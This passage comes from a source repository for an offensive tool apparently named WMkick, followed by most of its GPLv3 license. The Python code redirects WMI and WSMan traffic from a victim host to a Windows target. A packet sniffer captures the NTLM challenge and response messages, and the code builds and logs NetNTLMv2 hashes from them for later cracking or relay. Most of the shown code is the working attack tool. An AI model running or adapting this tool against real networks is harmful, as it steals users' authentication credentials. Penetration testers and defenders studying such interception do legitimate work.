self.tracker[sport].ntlm_blob = ntlm_blob 352 | 353 | # Check to see of all required elements have been acquired. If 354 | # yes, build and log the corresponding NetNTLMv2 hash. 355 | if self.tracker[sport].log_complete(): 356 | del self.tracker[sport] 357 | 358 | else: 359 | self.logger.debug("Unknown message structure. Here is a hex-dump:") 360 | self.logger.debug(ntlm_data.encode("hex")) 361 | 362 | def run(self): 363 | self.logger.info("Sniffer starting on %s port %s", self.listen_ip, self.listen_port) 364 | # Creates a Berkley Packet Filter to observe NTLM Authentication flow 365 | # request, challenge, and response messages, keeping track of them via 366 | # dynamic tcp port. Currently configured to only observe traffic between 367 | # victim and redirector. 368 | filteropt = ( 369 | '(ip dst host %s and dst port %s) or (ip src host %s and src port %s) and (not host %s)' 370 | % (self.listen_ip, self.listen_port, self.listen_ip, self.listen_port, self.target_ip) 371 | ) 372 | 373 | sniff(filter=filteropt, prn=self.search_ntlm) 374 | 375 | 376 | def catch_sigint(signal_number, stack_frame): # pylint: disable=W0613 377 | """ 378 | Handle interrupt (i.e., SIGINT) signals received from the keyboard 379 | (e.g., 'CTRL+C') or other processes (e.g., 'kill -INT '). 380 | """ 381 | print() 382 | getLogger(__name__).warning("Caught a SIGINT signal. Exiting...") 383 | exit(0) 384 | 385 | def create_thread_pair(threads, listen_ip, target_ip, protocol): 386 | """ 387 | Create a pair of threads: one for redirection and one for monitoring. 388 | """ 389 | ports = {'wmi': WMI_PORT, 'wsman-http': WSMAN_HTTP_PORT, 'wsman-https': WSMAN_HTTPS_PORT} 390 | name = protocol 391 | logger = getLogger(__name__) 392 | threads[name] = RedirectionHandler(name=name, 393 | daemon=True, 394 | listen_ip=listen_ip, 395 | listen_port=ports[protocol], 396 | target_ip=target_ip, 397 | target_port=ports[protocol], 398 | logger=logger) 399 | name = name + '-sniffer' 400 | threads[name] = NTLMHandler(name=name, 401 | daemon=True, 402 | listen_ip=listen_ip, 403 | listen_port=ports[protocol], 404 | target_ip=target_ip, 405 | logger=logger) 406 | 407 | def setup_logging(log_level): 408 | """ 409 | Defines the styling for a custom set of log levels, configures 410 | console logging for stderr and stdout, and returns a reference 411 | to the modified logger. 412 | """ 413 | 414 | # Define styling for a custom set of log levels. 415 | level_styles = {'critical': {'bold': True, 'color': 'red'}, 416 | 'debug': {'color': 'blue'}, 417 | 'error': {'color': 'red'}, 418 | 'info': {}, 419 | 'notice': {'color': 'magenta'}, 420 | 'spam': {'color': 'green', 'faint': True}, 421 | 'success': {'bold': True, 'color': 'green'}, 422 | 'verbose': {'color': 'blue'}, 423 | 'warning': {'color': 'yellow'}, 424 | 'hash': {'bold':True, 'color':'green'}} 425 | addLevelName(HASH_LOG_LEVEL, "HASH") 426 | logger_setup = getLogger(__name__) 427 | logger_setup.setLevel(log_level) 428 | 429 | # Configure console logging for stderr and stdout. Everything except 430 | # HASH_LOG_LEVEL is logged to stderr. 431 | stdout_handler = StreamHandler(stdout) 432 | stdout_handler.setLevel(45) 433 | stdout_handler.addFilter( 434 | type('', (Filter,), {'filter': staticmethod(lambda r: r.levelno == HASH_LOG_LEVEL)}) 435 | ) 436 | stdout_handler.setFormatter( 437 | ColoredFormatter(fmt='%(levelname)s %(asctime)s %(message)s', level_styles=level_styles) 438 | ) 439 | stderr_handler = StreamHandler(stderr) 440 | stderr_handler.setLevel(10) 441 | stderr_handler.addFilter( 442 | type('', (Filter,), {'filter': staticmethod(lambda r: r.levelno is not HASH_LOG_LEVEL)}) 443 | ) 444 | stderr_handler.setFormatter( 445 | ColoredFormatter(fmt='%(levelname)s %(asctime)s %(message)s', level_styles=level_styles) 446 | ) 447 | logger_setup.addHandler(stdout_handler) 448 | logger_setup.addHandler(stderr_handler) 449 | 450 | # Return a reference to the modified logger. 451 | return logger_setup 452 | 453 | 454 | def main(): 455 | """Program entry point if called as an executable.""" 456 | 457 | log_levels = OrderedDict({'critical':50, 'error':40, 'warning':30, 'info':20, 'debug':10}) 458 | 459 | parser = ArgumentParser(description=__description__) 460 | parser.add_argument('-L', '--log-level', 461 | choices=list(log_levels), 462 | default='info', 463 | help=""" 464 | Set the level of detail logged to the screen. Valid choices include: 465 | %(choices)s. Note that these choices are ordered from left to right 466 | according to the amount of information/detail (i.e., least to most) 467 | they provide. The default value is '%(default)s'. 468 | """, 469 | metavar='level') 470 | parser.add_argument('-l', '--listen-host', 471 | default=None, 472 | help=""" 473 | IPv4 address that will receive/monitor incoming requests. The default 474 | value is the IPv4 address translated from the local hostname. 475 | """, 476 | metavar='listen-host') 477 | parser.add_argument('-p', "--protocol", 478 | action='append', 479 | choices=['all', 'any', 'wmi', 'wsman-http', 'wsman-https'], 480 | default=None, 481 | dest='protocols', 482 | help=""" 483 | Specify a protocol to monitor. This option may be specified multiple 484 | times. Valid choices include: %(choices)s. The default value is 'all', 485 | which means monitor WMI (tcp/135), WSMan HTTP (tcp/5985), and WSMan 486 | HTTPS (tcp/5986) simulataneously. Note that support for WSMan HTTPS 487 | is not yet implemented. 488 | """) 489 | parser.add_argument('target_ip', 490 | help=""" 491 | IPv4 address of Windows target where the WMI/WSMAN server is hosted. 492 | """, 493 | metavar='target-ip') 494 | parser.add_argument('-v', '--version', 495 | action='version', 496 | help=""" 497 | Show version number and exit. 498 | """, 499 | version=get_release_string_pep440()) 500 | args = parser.parse_args() 501 | 502 | logger = setup_logging(log_levels.get(args.log_level)) 503 | 504 | print(BANNER) 505 | print(' Version: {}'.format(get_release_string_pep440())) 506 | print(" Press ctrl+c to kill this script.\n") 507 | 508 | if args.listen_host is None: 509 | try: 510 | listen_ip = gethostbyname(getfqdn()) 511 | except gaierror: 512 | logger.error("Could not determine primary IPv4 address. \ 513 | Please specify one with '--listen-host'.") 514 | exit(2) 515 | else: 516 | listen_ip = args.listen_host 517 | 518 | target_ip = args.target_ip 519 | for candidate in [listen_ip, target_ip]: 520 | try: 521 | IPv4Address(candidate) 522 | except AddressValueError: 523 | logger.error("IPv4 address argument \"%s\" is not valid. Please specify a valid one.", candidate) 524 | exit(2) 525 | 526 | if geteuid() != 0: 527 | logger.error("This program must run with root privileges.") 528 | exit(2) 529 | 530 | signal(SIGINT, catch_sigint) 531 | 532 | if args.protocols is None: 533 | args.protocols = ['all'] 534 | protocols = sorted(set(args.protocols)) 535 | if 'any' in protocols or 'all' in protocols: 536 | protocols = ['wmi', 'wsman-http'] 537 | 538 | threads = {} 539 | for protocol in protocols: 540 | if protocol == 'wsman-https': 541 | logger.warning("Protocol \"%s\" not yet implemented. Skipping...", protocol) 542 | continue 543 | create_thread_pair(threads, listen_ip, target_ip, protocol) 544 | 545 | for name in sorted(threads.keys()): 546 | threads[name].start() 547 | 548 | for name in sorted(threads.keys()): 549 | threads[name].join() 550 | 551 | exit(0) 552 | 553 | if __name__ == '__main__': 554 | main() 555 | -------------------------------------------------------------------------------- /README.LICENSE: -------------------------------------------------------------------------------- 1 | 2 | Table of Contents 3 | 4 | Section 1 .................... Overview 5 | Section 2 .................... GNU General Public License Version 3 6 | 7 | 1 Overview 8 | 9 | This document contains License information for The WMkick Project 10 | ("Project"), which was established by Houston Hunt in 2020. 11 | Unless specifically excluded, all files in the Project fall 12 | under the terms and conditions of the GNU General Public License 13 | Version 3 or later. Excluded files or components, if any, that 14 | fall under other licenses are detailed below as well. 15 | 16 | 2 GNU General Public License Version 3 17 | 18 | Copyright (C) 2007 Free Software Foundation, 19 | Inc. Everyone is permitted to copy and 20 | distribute verbatim copies of this license document, but changing 21 | it is not allowed. 22 | 23 | Preamble 24 | 25 | The GNU General Public License is a free, copyleft license for 26 | software and other kinds of works. 27 | 28 | The licenses for most software and other practical works are 29 | designed to take away your freedom to share and change the works. 30 | By contrast, the GNU General Public License is intended to 31 | guarantee your freedom to share and change all versions of a 32 | program--to make sure it remains free software for all its users. 33 | We, the Free Software Foundation, use the GNU General Public 34 | License for most of our software; it applies also to any other 35 | work released this way by its authors. You can apply it to your 36 | programs, too. 37 | 38 | When we speak of free software, we are referring to freedom, 39 | not price. Our General Public Licenses are designed to make sure 40 | that you have the freedom to distribute copies of free software 41 | (and charge for them if you wish), that you receive source code 42 | or can get it if you want it, that you can change the software 43 | or use pieces of it in new free programs, and that you know you 44 | can do these things. 45 | 46 | To protect your rights, we need to prevent others from denying you 47 | these rights or asking you to surrender the rights. Therefore, 48 | you have certain responsibilities if you distribute copies of 49 | the software, or if you modify it: responsibilities to respect 50 | the freedom of others. 51 | 52 | For example, if you distribute copies of such a program, whether 53 | gratis or for a fee, you must pass on to the recipients the same 54 | freedoms that you received. You must make sure that they, too, 55 | receive or can get the source code. And you must show them these 56 | terms so they know their rights. 57 | 58 | Developers that use the GNU GPL protect your rights with two steps: 59 | (1) assert copyright on the software, and (2) offer you this 60 | License giving you legal permission to copy, distribute and/or 61 | modify it. 62 | 63 | For the developers' and authors' protection, the GPL clearly 64 | explains that there is no warranty for this free software. 65 | For both users' and authors' sake, the GPL requires that modified 66 | versions be marked as changed, so that their problems will not 67 | be attributed erroneously to authors of previous versions. 68 | 69 | Some devices are designed to deny users access to install or 70 | run modified versions of the software inside them, although the 71 | manufacturer can do so. This is fundamentally incompatible with 72 | the aim of protecting users' freedom to change the software. 73 | The systematic pattern of such abuse occurs in the area of 74 | products for individuals to use, which is precisely where it is 75 | most unacceptable. Therefore, we have designed this version of 76 | the GPL to prohibit the practice for those products. If such 77 | problems arise substantially in other domains, we stand ready to 78 | extend this provision to those domains in future versions of the 79 | GPL, as needed to protect the freedom of users. 80 | 81 | Finally, every program is threatened constantly by software 82 | patents. States should not allow patents to restrict development 83 | and use of software on general-purpose computers, but in those that 84 | do, we wish to avoid the special danger that patents applied to a 85 | free program could make it effectively proprietary. To prevent 86 | this, the GPL assures that patents cannot be used to render the 87 | program non-free. 88 | 89 | The precise terms and conditions for copying, distribution and 90 | modification follow. 91 | 92 | TERMS AND CONDITIONS 93 | 94 | 0. Definitions. 95 | 96 | "This License" refers to version 3 of the GNU General Public 97 | License. 98 | 99 | "Copyright" also means copyright-like laws that apply to other 100 | kinds of works, such as semiconductor masks. 101 | 102 | "The Program" refers to any copyrightable work licensed under 103 | this License. Each licensee is addressed as "you". "Licensees" 104 | and "recipients" may be individuals or organizations. 105 | 106 | To "modify" a work means to copy from or adapt all or part of the 107 | work in a fashion requiring copyright permission, other than the 108 | making of an exact copy. The resulting work is called a "modified 109 | version" of the earlier work or a work "based on" the earlier work. 110 | 111 | A "covered work" means either the unmodified Program or a work 112 | based on the Program. 113 | 114 | To "propagate" a work means to do anything with it that, without 115 | permission, would make you directly or secondarily liable for 116 | infringement under applicable copyright law, except executing it 117 | on a computer or modifying a private copy. Propagation includes 118 | copying, distribution (with or without modification), making 119 | available to the public, and in some countries other activities 120 | as well. 121 | 122 | To "convey" a work means any kind of propagation that enables 123 | other parties to make or receive copies. Mere interaction with 124 | a user through a computer network, with no transfer of a copy, 125 | is not conveying. 126 | 127 | An interactive user interface displays "Appropriate Legal Notices" 128 | to the extent that it includes a convenient and prominently visible 129 | feature that (1) displays an appropriate copyright notice, and 130 | (2) tells the user that there is no warranty for the work (except 131 | to the extent that warranties are provided), that licensees may 132 | convey the work under this License, and how to view a copy of 133 | this License. If the interface presents a list of user commands 134 | or options, such as a menu, a prominent item in the list meets 135 | this criterion. 136 | 137 | 1. Source Code. 138 | 139 | The "source code" for a work means the preferred form of the 140 | work for making modifications to it. "Object code" means any 141 | non-source form of a work. 142 | 143 | A "Standard Interface" means an interface that either is an 144 | official standard defined by a recognized standards body, or, 145 | in the case of interfaces specified for a particular programming 146 | language, one that is widely used among developers working in 147 | that language. 148 | 149 | The "System Libraries" of an executable work include anything, 150 | other than the work as a whole, that (a) is included in the normal 151 | form of packaging a Major Component, but which is not part of that 152 | Major Component, and (b) serves only to enable use of the work 153 | with that Major Component, or to implement a Standard Interface 154 | for which an implementation is available to the public in source 155 | code form. A "Major Component", in this context, means a major 156 | essential component (kernel, window system, and so on) of the 157 | specific operating system (if any) on which the executable work 158 | runs, or a compiler used to produce the work, or an object code 159 | interpreter used to run it. 160 | 161 | The "Corresponding Source" for a work in object code form means 162 | all the source code needed to generate, install, and (for an 163 | executable work) run the object code and to modify the work, 164 | including scripts to control those activities. However, it does 165 | not include the work's System Libraries, or general-purpose tools 166 | or generally available free programs which are used unmodified in 167 | performing those activities but which are not part of the work. 168 | For example, Corresponding Source includes interface definition 169 | files associated with source files for the work, and the source 170 | code for shared libraries and dynamically linked subprograms that 171 | the work is specifically designed to require, such as by intimate 172 | data communication or control flow between those subprograms and 173 | other parts of the work. 174 | 175 | The Corresponding Source need not include anything that users can 176 | regenerate automatically from other parts of the Corresponding 177 | Source. 178 | 179 | The Corresponding Source for a work in source code form is that 180 | same work. 181 | 182 | 2. Basic Permissions. 183 | 184 | All rights granted under this License are granted for the term 185 | of copyright on the Program, and are irrevocable provided the 186 | stated conditions are met. This License explicitly affirms your 187 | unlimited permission to run the unmodified Program. The output 188 | from running a covered work is covered by this License only 189 | if the output, given its content, constitutes a covered work. 190 | This License acknowledges your rights of fair use or other 191 | equivalent, as provided by copyright law. 192 | 193 | You may make, run and propagate covered works that you do not 194 | convey, without conditions so long as your license otherwise 195 | remains in force. You may convey covered works to others for the 196 | sole purpose of having them make modifications exclusively for 197 | you, or provide you with facilities for running those works, 198 | provided that you comply with the terms of this License in 199 | conveying all material for which you do not control copyright. 200 | Those thus making or running the covered works for you must do so 201 | exclusively on your behalf, under your direction and control, 202 | on terms that prohibit them from making any copies of your 203 | copyrighted material outside their relationship with you. 204 | 205 | Conveying under any other circumstances is permitted solely 206 | under the conditions stated below. Sublicensing is not allowed; 207 | section 10 makes it unnecessary. 208 | 209 | 3. Protecting Users' Legal Rights From Anti-Circumvention Law. 210 | 211 | No covered work shall be deemed part of an effective technological 212 | measure under any applicable law fulfilling obligations under 213 | article 11 of the WIPO copyright treaty adopted on 20 December 214 | 1996, or similar laws prohibiting or restricting circumvention 215 | of such measures. 216 | 217 | When you convey a covered work, you waive any legal power to 218 | forbid circumvention of technological measures to the extent such 219 | circumvention is effected by exercising rights under this License 220 | with respect to the covered work, and you disclaim any intention 221 | to limit operation or modification of the work as a means of 222 | enforcing, against the work's users, your or third parties' 223 | legal rights to forbid circumvention of technological measures. 224 | 225 | 4. Conveying Verbatim Copies. 226 | 227 | You may convey verbatim copies of the Program's source code as 228 | you receive it, in any medium, provided that you conspicuously 229 | and appropriately publish on each copy an appropriate copyright 230 | notice; keep intact all notices stating that this License and any 231 | non-permissive terms added in accord with section 7 apply to the 232 | code; keep intact all notices of the absence of any warranty; and 233 | give all recipients a copy of this License along with the Program. 234 | 235 | You may charge any price or no price for each copy that you convey, 236 | and you may offer support or warranty protection for a fee. 237 | 238 | 5. Conveying Modified Source Versions. 239 | 240 | You may convey a work based on the Program, or the modifications 241 | to produce it from the Program, in the form of source code under 242 | the terms of section 4, provided that you also meet all of these 243 | conditions: 244 | 245 | a) The work must carry prominent notices stating that you 246 | modified it, and giving a relevant date. 247 | 248 | b) The work must carry prominent notices stating that it is 249 | released under this License and any conditions added under 250 | section 7. This requirement modifies the requirement in section 251 | 4 to "keep intact all notices". 252 | 253 | c) You must license the entire work, as a whole, under 254 | this License to anyone who comes into possession of a copy. 255 | This License will therefore apply, along with any applicable 256 | section 7 additional terms, to the whole of the work, and all 257 | its parts, regardless of how they are packaged. This License 258 | gives no permission to license the work in any other way, but 259 | it does not invalidate such permission if you have separately 260 | received it. 261 | 262 | d) If the work has interactive user interfaces, each must 263 | display Appropriate Legal Notices; however, if the Program has 264 | interactive interfaces that do not display Appropriate Legal 265 | Notices, your work need not make them do so. 266 | 267 | A compilation of a covered work with other separate and independent 268 | works, which are not by their nature extensions of the covered 269 | work, and which are not combined with it such as to form a larger 270 | program, in or on a volume of a storage or distribution medium, 271 | is called an "aggregate" if the compilation and its resulting 272 | copyright are not used to limit the access or legal rights of 273 | the compilation's users beyond what the individual works permit. 274 | Inclusion of a covered work in an aggregate does not cause this 275 | License to apply to the other parts of the aggregate. 276 | 277 | 6. Conveying Non-Source Forms. 278 | 279 | You may convey a covered work in object code form under the 280 | terms of sections 4 and 5, provided that you also convey the 281 | machine-readable Corresponding Source under the terms of this 282 | License, in one of these ways: 283 | 284 | a) Convey the object code in, or embodied in, a physical product 285 | (including a physical distribution medium), accompanied by 286 | the Corresponding Source fixed on a durable physical medium 287 | customarily used for software interchange. 288 | 289 | b) Convey the object code in, or embodied in, a physical product 290 | (including a physical distribution medium), accompanied by 291 | a written offer, valid for at least three years and valid 292 | for as long as you offer spare parts or customer support for 293 | that product model, to give anyone who possesses the object 294 | code either (1) a copy of the Corresponding Source for all 295 | the software in the product that is covered by this License, 296 | on a durable physical medium customarily used for software 297 | interchange, for a price no more than your reasonable cost of 298 | physically performing this conveying of source, or (2) access to 299 | copy the Corresponding Source from a network server at no charge. 300 | 301 | c) Convey individual copies of the object code with a copy of 302 | the written offer to provide the Corresponding Source. This 303 | alternative is allowed only occasionally and noncommercially, 304 | and only if you received the object code with such an offer, 305 | in accord with subsection 6b. 306 | 307 | d) Convey the object code by offering access from a designated 308 | place (gratis or for a charge), and offer equivalent access 309 | to the Corresponding Source in the same way through the same 310 | place at no further charge. You need not require recipients 311 | to copy the Corresponding Source along with the object code. 312 | If the place to copy the object code is a network server, the 313 | Corresponding Source may be on a different server (operated 314 | by you or a third party) that supports equivalent copying 315 | facilities, provided you maintain clear directions next to 316 | the object code saying where to find the Corresponding Source. 317 | Regardless of what server hosts the Corresponding Source, you 318 | remain obligated to ensure that it is available for as long as 319 | needed to satisfy these requirements. 320 | 321 | e) Convey the object code using peer-to-peer transmission, 322 | provided you inform other peers where the object code and 323 | Corresponding Source of the work are being offered to the 324 | general public at no charge under subsection 6d. 325 | 326 | A separable portion of the object code, whose source code is 327 | excluded from the Corresponding Source as a System Library, 328 | need not be included in conveying the object code work. 329 | 330 | A "User Product" is either (1) a "consumer product", which means 331 | any tangible personal property which is normally used for personal, 332 | family, or household purposes, or (2) anything designed or sold for 333 | incorporation into a dwelling. In determining whether a product 334 | is a consumer product, doubtful cases shall be resolved in favor of 335 | coverage. For a particular product received by a particular user, 336 | "normally used" refers to a typical or common use of that class 337 | of product, regardless of the status of the particular user or of 338 | the way in which the particular user actually uses, or expects or 339 | is expected to use, the product. A product is a consumer product 340 | regardless of whether the product has substantial commercial, 341 | industrial or non-consumer uses, unless such uses represent the 342 | only significant mode of use of the product. 343 | 344 | "Installation Information" for a User Product means any methods, 345 | procedures, authorization keys, or other information required 346 | to install and execute modified versions of a covered work in 347 | that User Product from a modified version of its Corresponding 348 | Source. The information must suffice to ensure that the continued 349 | functioning of the modified object code is in no case prevented 350 | or interfered with solely because modification has been made. 351 | 352 | If you convey an object code work under this section in, or with, 353 | or specifically for use in, a User Product, and the conveying 354 | occurs as part of a transaction in which the right of possession 355 | and use of the User Product is transferred to the recipient in 356 | perpetuity or for a fixed term (regardless of how the transaction 357 | is characterized), the Corresponding Source conveyed under this 358 | section must be accompanied by the Installation Information. 359 | But this requirement does not apply if neither you nor any third 360 | party retains the ability to install modified object code on the 361 | User Product (for example, the work has been installed in ROM). 362 | 363 | The requirement to provide Installation Information does not 364 | include a requirement to continue to provide support service, 365 | warranty, or updates for a work that has been modified or installed 366 | by the recipient, or for the User Product in which it has been 367 | modified or installed. Access to a network may be denied when 368 | the modification itself materially and adversely affects the 369 | operation of the network or violates the rules and protocols for 370 | communication across the network. 371 | 372 | Corresponding Source conveyed, and Installation Information 373 | provided, in accord with this section must be in a format that is 374 | publicly documented (and with an implementation available to the 375 | public in source code form), and must require no special password 376 | or key for unpacking, reading or copying. 377 | 378 | 7. Additional Terms. 379 | 380 | "Additional permissions" are terms that supplement the terms 381 | of this License by making exceptions from one or more of its 382 | conditions. Additional permissions that are applicable to the 383 | entire Program shall be treated as though they were included in 384 | this License, to the extent that they are valid under applicable 385 | law. If additional permissions apply only to part of the Program, 386 | that part may be used separately under those permissions, but the 387 | entire Program remains governed by this License without regard 388 | to the additional permissions. 389 | 390 | When you convey a copy of a covered work, you may at your option 391 | remove any additional permissions from that copy, or from any part 392 | of it. (Additional permissions may be written to require their own 393 | removal in certain cases when you modify the work.) You may place 394 | additional permissions on material, added by you to a covered work, 395 | for which you have or can give appropriate copyright permission. 396 | 397 | Notwithstanding any other provision of this License, for material 398 | you add to a covered work, you may (if authorized by the copyright 399 | holders of that material) supplement the terms of this License 400 | with terms: 401 | 402 | a) Disclaiming warranty or limiting liability differently from 403 | the terms of sections 15 and 16 of this License; or 404 | 405 | b) Requiring preservation of specified reasonable legal notices 406 | or author attributions in that material or in the Appropriate 407 | Legal Notices displayed by works containing it; or 408 | 409 | c) Prohibiting misrepresentation of the origin of that material, 410 | or requiring that modified versions of such material be marked 411 | in reasonable ways as different from the original version; or 412 | 413 | d) Limiting the use for publicity purposes of names of licensors 414 | or authors of the material; or 415 | 416 | e) Declining to grant rights under trademark law for use of 417 | some trade names, trademarks, or service marks; or 418 | 419 | f) Requiring indemnification of licensors and authors of 420 | that material by anyone who conveys the material (or modified 421 | versions of it) with contractual assumptions of liability to the 422 | recipient, for any liability that these contractual assumptions 423 | directly impose on those licensors and authors. 424 | 425 | All other non-permissive additional terms are considered "further 426 | restrictions" within the meaning of section 10. If the Program 427 | as you received it, or any part of it, contains a notice stating 428 | that it is governed by this License along with a term that is 429 | a further restriction, you may remove that term. If a license 430 | document contains a further restriction but permits relicensing 431 | or conveying under this License, you may add to a covered work 432 | material governed by the terms of that license document, provided 433 | that the further restriction does not survive such relicensing 434 | or conveying. 435 | 436 | If you add terms to a covered work in accord with this section, 437 | you must place, in the relevant source files, a statement of the 438 | additional terms that apply to those files, or a notice indicating 439 | where to find the applicable terms. 440 | 441 | Additional terms, permissive or non-permissive, may be stated in 442 | the form of a separately written license, or stated as exceptions; 443 | the above requirements apply either way. 444 | 445 | 8. Termination. 446 | 447 | You may not propagate or modify a covered work except as expressly 448 | provided under this License. Any attempt otherwise to propagate 449 | or modify it is void, and will automatically terminate your rights 450 | under this License (including any patent licenses granted under 451 | the third paragraph of section 11). 452 | 453 | However, if you cease all violation of this License, then your 454 | license from a particular copyright holder is reinstated (a) 455 | provisionally, unless and until the copyright holder explicitly 456 | and finally terminates your license, and (b) permanently, if the 457 | copyright holder fails to notify you of the violation by some 458 | reasonable means prior to 60 days after the cessation. 459 | 460 | Moreover, your license from a particular copyright holder is 461 | reinstated permanently if the copyright holder notifies you of 462 | the violation by some reasonable means, this is the first time you 463 | have received notice of violation of this License (for any work) 464 | from that copyright holder, and you cure the violation prior to 465 | 30 days after your receipt of the notice. 466 | 467 | Termination of your rights under this section does not terminate 468 | the licenses of parties who have received copies or rights from 469 | you under this License. If your rights have been terminated and 470 | not permanently reinstated, you do not qualify to receive new 471 | licenses for the same material under section 10. 472 | 473 | 9. Acceptance Not Required for Having Copies. 474 | 475 | You are not required to accept this License in order to 476 | receive or run a copy of the Program. Ancillary propagation 477 | of a covered work occurring solely as a consequence of using 478 | peer-to-peer transmission to receive a copy likewise does not 479 | require acceptance. However, nothing other than this License 480 | grants you permission to propagate or modify any covered work. 481 | These actions infringe copyright if you do not accept this License. 482 | Therefore, by modifying or propagating a covered work, you indicate 483 | your acceptance of this License to do so. 484 | 485 | 10. Automatic Licensing of Downstream Recipients. 486 | 487 | Each time you convey a covered work, the recipient automatically 488 | receives a license from the original licensors, to run, modify 489 | and propagate that work, subject to this License. You are not 490 | responsible for enforcing compliance by third parties with this 491 | License. 492 | 493 | An "entity transaction" is a transaction transferring control of an 494 | organization, or substantially all assets of one, or subdividing 495 | an organization, or merging organizations. If propagation of a 496 | covered work results from an entity transaction, each party to 497 | that transaction who receives a copy of the work also receives 498 | whatever licenses to the work the party's predecessor in interest 499 | had or could give under the previous paragraph, plus a right 500 | to possession of the Corresponding Source of the work from the 501 | predecessor in interest, if the predecessor has it or can get it 502 | with reasonable efforts. 503 | 504 | You may not impose any further restrictions on the exercise of 505 | the rights granted or affirmed under this License. For example, 506 | you may not impose a license fee, royalty, or other charge for 507 | exercise of rights granted under this License, and you may not 508 | initiate litigation (including a cross-claim or counterclaim in a 509 | lawsuit) alleging that any patent claim is infringed by making, 510 | using, selling, offering for sale, or importing the Program or 511 | any portion of it. 512 | 513 | 11. Patents. 514 | 515 | A "contributor" is a copyright holder who authorizes use under this 516 | License of the Program or a work on which the Program is based. 517 | The work thus licensed is called the contributor's "contributor 518 | version". 519 | 520 | A contributor's "essential patent claims" are all patent claims 521 | owned or controlled by the contributor, whether already acquired 522 | or hereafter acquired, that would be infringed by some manner, 523 | permitted by this License, of making, using, or selling its 524 | contributor version, but do not include claims that would be 525 | infringed only as a consequence of further modification of 526 | the contributor version. For purposes of this definition, 527 | "control" includes the right to grant patent sublicenses in a 528 | manner consistent with the requirements of this License. 529 | 530 | Each contributor grants you a non-exclusive, worldwide, 531 | royalty-free patent license under the contributor's essential 532 | patent claims, to make, use, sell, offer for sale, import 533 | and otherwise run, modify and propagate the contents of its 534 | contributor version. 535 | 536 | In the following three paragraphs, a "patent license" is any 537 | express agreement or commitment, however denominated, not to 538 | enforce a patent (such as an express permission to practice a 539 | patent or covenant not to sue for patent infringement). To "grant" 540 | such a patent license to a party means to make such an agreement 541 | or commitment not to enforce a patent against the party. 542 | 543 | If you convey a covered work, knowingly relying on a patent 544 | license, and the Corresponding Source of the work is not available 545 | for anyone to copy, free of charge and under the terms of this 546 | License, through a publicly available network server or other 547 | readily accessible means, then you must either (1) cause the 548 | Corresponding Source to be so available, or (2) arrange to 549 | deprive yourself of the benefit of the patent license for this 550 | particular work, or (3) arrange, in a manner consistent with the 551 | requirements of this License, to extend the patent license to 552 | downstream recipients. "Knowingly relying" means you have actual 553 | knowledge that, but for the patent license, your conveying the 554 | covered work in a country, or your recipient's use of the covered 555 | work in a country, would infringe one or more identifiable patents 556 | in that country that you have reason to believe are valid. 557 | 558 | If, pursuant to or in connection with a single transaction or 559 | arrangement, you convey, or propagate by procuring conveyance 560 | of, a covered work, and grant a patent license to some of the 561 | parties receiving the covered work authorizing them to use, 562 | propagate, modify or convey a specific copy of the covered work, 563 | then the patent license you grant is automatically extended to 564 | all recipients of the covered work and works based on it. 565 | 566 | A patent license is "discriminatory" if it does not include 567 | within the scope of its coverage, prohibits the exercise of, or 568 | is conditioned on the non-exercise of one or more of the rights 569 | that are specifically granted under this License. You may not 570 | convey a covered work if you are a party to an arrangement with 571 | a third party that is in the business of distributing software, 572 | under which you make payment to the third party based on the 573 | extent of your activity of conveying the work, and under which 574 | the third party grants, to any of the parties who would receive 575 | the covered work from you, a discriminatory patent license (a) 576 | in connection with copies of the covered work conveyed by you 577 | (or copies made from those copies), or (b) primarily for and in 578 | connection with specific products or compilations that contain 579 | the covered work, unless you entered into that arrangement, 580 | or that patent license was granted, prior to 28 March 2007. 581 | 582 | Nothing in this License shall be construed as excluding or limiting 583 | any implied license or other defenses to infringement that may 584 | otherwise be available to you under applicable patent law. 585 | 586 | 12. No Surrender of Others' Freedom. 587 | 588 | If conditions are imposed on you (whether by court order, agreement 589 | or otherwise) that contradict the conditions of this License, they 590 | do not excuse you from the conditions of this License. If you 591 | cannot convey a covered work so as to satisfy simultaneously your 592 | obligations under this License and any other pertinent obligations, 593 | then as a consequence you may not convey it at all. For example, 594 | if you agree to terms that obligate you to collect a royalty 595 | for further conveying from those to whom you convey the Program, 596 | the only way you could satisfy both those terms and this License 597 | would be to refrain entirely from conveying the Program. 598 | 599 | 13. Use with the GNU Affero General Public License. 600 | 601 | Notwithstanding any other provision of this License, you have 602 | permission to link or combine any covered work with a work 603 | licensed under version 3 of the GNU Affero General Public License 604 | into a single combined work, and to convey the resulting work. 605 | The terms of this License will continue to apply to the part 606 | which is the covered work, but the special requirements of the GNU 607 | Affero General Public License, section 13, concerning interaction 608 | through a network will apply to the combination as such. 609 | 610 | 14. Revised Versions of this License. 611 | 612 | The Free Software Foundation may publish revised and/or new 613 | versions of the GNU General Public License from time to time. 614 | Such new versions will be similar in spirit to the present version, 615 | but may differ in detail to address new problems or concerns. 616 | 617 | Each version is given a distinguishing version number. If the 618 | Program specifies that a certain numbered version of the GNU 619 | General Public License "or any later version" applies to it, 620 | you have the option of following the terms and conditions either 621 | of that numbered version or of any later version published by 622 | the Free Software Foundation. If the Program does not specify a 623 | version number of the GNU General Public License, you may choose 624 | any version ever published by the Free Software Foundation. 625 | 626 | If the Program specifies that a proxy can decide which future 627 | versions of the GNU General Public License can be used, that 628 | proxy's public statement of acceptance of a version permanently 629 | authorizes you to choose that version for the Program. 630 | 631 | Later license versions may give you additional or different 632 | permissions. However, no additional obligations are imposed on 633 | any author or copyright holder as a result of your choosing to 634 | follow a later version. 635 | 636 | 15. Disclaimer of Warranty. 637 | 638 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED 639 | BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING 640 | THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM 641 | "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR 642 | IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF 643 | MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE 644 | RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. 645 | SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL 646 | NECESSARY SERVICING, REPAIR OR CORRECTION. 647 | 648 | 16. Limitation of Liability. 649 | 650 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO 651 | IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO 652 | 